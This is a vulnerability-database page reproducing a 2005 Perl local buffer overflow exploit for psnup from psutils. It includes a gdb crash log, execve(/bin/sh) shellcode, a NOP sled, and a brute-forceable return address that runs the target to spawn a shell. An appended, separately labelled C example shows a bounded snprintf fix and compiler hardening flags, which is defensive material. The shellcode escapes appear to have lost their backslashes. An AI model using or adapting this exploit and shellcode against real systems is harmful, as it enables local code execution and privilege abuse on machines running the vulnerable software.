PostScript Utilities – ‘psnup’ Local Buffer Overflow

Vulnerability ID 1054973 Vulnerability type
Published 2005-03-21 Updated 2005-03-21
CVE ID N/A
CNNVD-ID N/A
Platform Linux CVSS score N/A
|Source
https://www.exploit-db.com/exploits/890
|Details
Vulnerability details have not been disclosed
|Exploit
#!/usr/bin/perl

#         PostScript Utilities - psnup  (all the utilities of the package are vulnerable) *
#      						 	                                  *	
#           written by lammat just for practice purposes                                  *
#                       tested against psutils-p17                                        *
# (gdb) r -8 `perl -e 'print "A"x250'`                                                    *
# The program being debugged has been started already.                                    *
# Start it from the beginning? (y or n) y                                                 *
# Starting program: /usr/bin/psnup -8 `perl -e 'print "A"x250'`                           *
# (no debugging symbols found).../usr/bin/psnup: can't open input file                    *
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....                     *
#                                                                                         *
# Program received signal SIGSEGV, Segmentation fault.                                    *   
# 0x41414141 in ?? ()                                                                     *  

#  execve(/bin/sh) for linux x86
#   29 bytes
#   by Matias Sedalo


$shellcode = 
"x31xdbx53x8dx43x17xcdx80x99x68x6ex2fx73x68x68".
"x2fx2fx62x69x89xe3x50x53x89xe1xb0x0bxcdx80";

$len = 250;
$ret = 0xbffff3a0; 
$nop = "x90";
$oops="/usr/bin/psnup";
$offset = 900; 

# offset bruteforce purposes below
if (@ARGV == 1) {
    $offset = $ARGV[0];}

for ($i=0; $i<($len-length($shellcode)-100);$i++)
	{$buffer .= $nop;
}

$buffer .= $shellcode;

print ("Address: 0x",sprintf('%lx',($ret + $offset)),"n");

$new_ret = pack('l',($ret + $offset));

until(length($buffer)==$len)
{
$buffer.=$new_ret;
}
exec("$oops -8 $buffer");

# milw0rm.com [2005-03-21]
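
The gdb session in the header shows the crash immediately after the "can't open input file" diagnostic echoes the 250-byte argument. The following is an added example, not psutils source and not part of the original exploit: it assumes the overflow comes from formatting that argument into a fixed-size stack buffer without a bound, and shows a bounded replacement. `format_diag` and `demo_long_name` are hypothetical names, and the 250-byte input is constructed to mirror the gdb run.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Unsafe pattern, shown as a comment only (assumed, not taken from psutils):
 *     char buf[N];
 *     sprintf(buf, "%s: can't open input file %s", prog, name);
 * Nothing bounds `name`, so a 250-byte argument runs past the end of buf
 * and over the saved return address (0x41414141 in the gdb output). */

/* Hypothetical helper: format "<prog>: <message>" into a caller-supplied
 * buffer. Returns 0 if the whole message fit, 1 if it was truncated,
 * -1 on error. The output is always NUL-terminated. */
int format_diag(char *out, size_t outsz, const char *prog, const char *fmt, ...)
{
    va_list ap;
    int n, m;

    if (out == NULL || outsz == 0)
        return -1;
    n = snprintf(out, outsz, "%s: ", prog);
    if (n < 0) { out[0] = '\0'; return -1; }
    if ((size_t)n >= outsz)
        return 1;                       /* prefix alone filled the buffer */
    va_start(ap, fmt);
    m = vsnprintf(out + n, outsz - (size_t)n, fmt, ap);
    va_end(ap);
    if (m < 0) { out[n] = '\0'; return -1; }
    return ((size_t)m >= outsz - (size_t)n) ? 1 : 0;
}

/* Constructed input: a 250-byte file name, as in the gdb session. */
int demo_long_name(char *out, size_t outsz)
{
    char name[251];
    memset(name, 'A', 250);
    name[250] = '\0';
    return format_diag(out, outsz, "psnup", "can't open input file %s", name);
}

int main(void)
{
    char msg[64];
    int rc = demo_long_name(msg, sizeof msg);
    fprintf(stderr, "%s%s\n", msg, rc == 1 ? " [truncated]" : "");
    return 0;
}
```

Building with `-D_FORTIFY_SOURCE=2 -fstack-protector-strong` additionally turns an unbounded `sprintf` of this kind into an abort rather than a controllable return address.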
